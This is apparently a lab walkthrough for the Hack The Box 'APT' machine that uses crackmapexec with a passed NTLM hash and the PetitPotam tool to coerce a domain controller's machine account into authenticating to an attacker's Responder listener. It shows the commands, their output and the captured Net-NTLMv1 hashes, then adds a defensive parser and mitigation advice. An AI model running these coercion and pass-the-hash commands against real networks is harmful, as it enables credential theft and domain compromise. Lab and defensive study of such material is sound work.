NTLM Relay via PetitPotam
Another solution to invoke a SYSTEM-level Net-NTLMv1 authentication to an attacker-controlled SMB server.
This can be done as any regular domain user, without elevating privileges to the henry.vinson_adm user.
Testing
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M petitpotam
SMB apt.htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB apt.htb.local 445 APT [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
PETITPOT... apt.htb.local 445 APT VULNERABLE
PETITPOT... apt.htb.local 445 APT Next step: https://github.com/topotam/PetitPotam
PetitPotam
┌──(kali㉿kali)-[~/…/htb/labs/apt/PetitPotam]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache python3 PetitPotam.py 10.10.16.8 apt.htb.local -d HTB.LOCAL -no-pass -k -dc-ip $IPv6 -target-ip $IPv6 -pipe all
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe efsr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsarpc
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe samr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\samr]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe netlogon
[-] connecting to ncacn_np:apt.htb.local[\PIPE\netlogon]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsass
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsass]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Done through 5 different MSRPC pipes (efsr, lsarpc, samr, netlogon, lsass), each one coercing an authentication from the machine account.
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Captured on Responder (one capture per coerced authentication; every one carries the same response, since the challenge is fixed).
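What those Responder lines tell a defender, as an added example that is not part of the original write-up and not Responder's own code: a small parser for the `[smb] ntlmv1 ...` capture format (client, username, then the Net-NTLMv1 line `user::domain:LMresp:NTresp:challenge`), which deduplicates the repeated captures and flags the properties visible above: a machine account (`APT$`) authenticating, NTLMv1 rather than NTLMv2, the non-random challenge 1122334455667788 that a capture server configured with a fixed challenge sends, and identical LM and NT response fields (no extended session security). The sample input is constructed from the capture lines shown on this page; the function names and the flag labels are this example's own.

```python
import re

# Constructed sample input: two of the identical capture blocks printed by
# Responder on this page (same client, account and hash value as shown above).
SAMPLE_CAPTURE = """\
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
"""

# One Responder log line: "[<listener>] <ntlm version> <field> : <value>"
LINE_RE = re.compile(
    r"^\[(?P<listener>\w+)\]\s+(?P<version>ntlmv[12])\s+"
    r"(?P<field>client|username|hash)\s*:\s*(?P<value>.+?)\s*$"
)
HEX = set("0123456789abcdefABCDEF")
# The non-random challenge a capture server sends when its challenge is fixed
# rather than generated per session.
STATIC_CHALLENGE = "1122334455667788"


def parse_netntlmv1(hash_line):
    """Split 'user::domain:LMresp:NTresp:challenge' and validate field sizes."""
    parts = hash_line.split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a Net-NTLMv1 hash line")
    user, _, domain, lm, nt, chal = parts
    # LM and NT responses are 24 bytes, the server challenge 8 bytes (hex-encoded).
    for name, val, size in (("LM response", lm, 48), ("NT response", nt, 48), ("challenge", chal, 16)):
        if len(val) != size or not set(val) <= HEX:
            raise ValueError(f"{name} must be {size} hex characters")
    return {"user": user, "domain": domain, "lm_response": lm.upper(),
            "nt_response": nt.upper(), "challenge": chal.lower()}


def parse_responder_capture(text):
    """Group consecutive client/username/hash lines into capture records."""
    records, current = [], {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner lines, blank lines, output of other listeners
        current[m["field"]] = m["value"]
        current["listener"], current["version"] = m["listener"], m["version"]
        if m["field"] == "hash":  # the hash line closes a capture block
            records.append(current)
            current = {}
    return records


def analyze(records):
    """Deduplicate captures and flag what each one tells a defender."""
    seen, findings = set(), []
    for rec in records:
        h = parse_netntlmv1(rec["hash"])
        key = (h["user"], h["domain"], h["nt_response"], h["challenge"])
        if key in seen:
            continue  # repeated capture of the same coerced authentication
        seen.add(key)
        flags = []
        if h["user"].endswith("$"):
            flags.append("machine-account")   # a host, not a person, was coerced
        if rec["version"] == "ntlmv1":
            flags.append("ntlmv1")            # legacy DES-based response
        if h["challenge"] == STATIC_CHALLENGE:
            flags.append("static-challenge")  # challenge was not random
        if h["lm_response"] == h["nt_response"]:
            flags.append("no-ess")            # same 24 bytes in both fields
        findings.append({"client": rec["client"],
                         "account": f'{h["domain"]}\\{h["user"]}',
                         "flags": flags})
    return {"captures": len(records), "unique": len(findings), "findings": findings}


if __name__ == "__main__":
    summary = analyze(parse_responder_capture(SAMPLE_CAPTURE))
    print(f'{summary["captures"]} captures, {summary["unique"]} unique')
    for f in summary["findings"]:
        print(f'{f["client"]} {f["account"]}: {", ".join(f["flags"])}')
```

Read as a detection signal, a domain controller's machine account performing outbound SMB authentication with NTLMv1 to a host that is not a file server is the event worth alerting on. The crackmapexec banner above reports signing:True for the target, so SMB signing already prevents relaying this coerced authentication back to the same SMB service; what remains of value to an attacker is the NTLMv1 response itself, which is why the write-up moves on to cracking. Enforcing NTLMv2 only (LmCompatibilityLevel 5) on domain controllers removes that, and Microsoft's PetitPotam mitigation guidance addresses the EFSRPC coercion itself.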
Moving on to cracking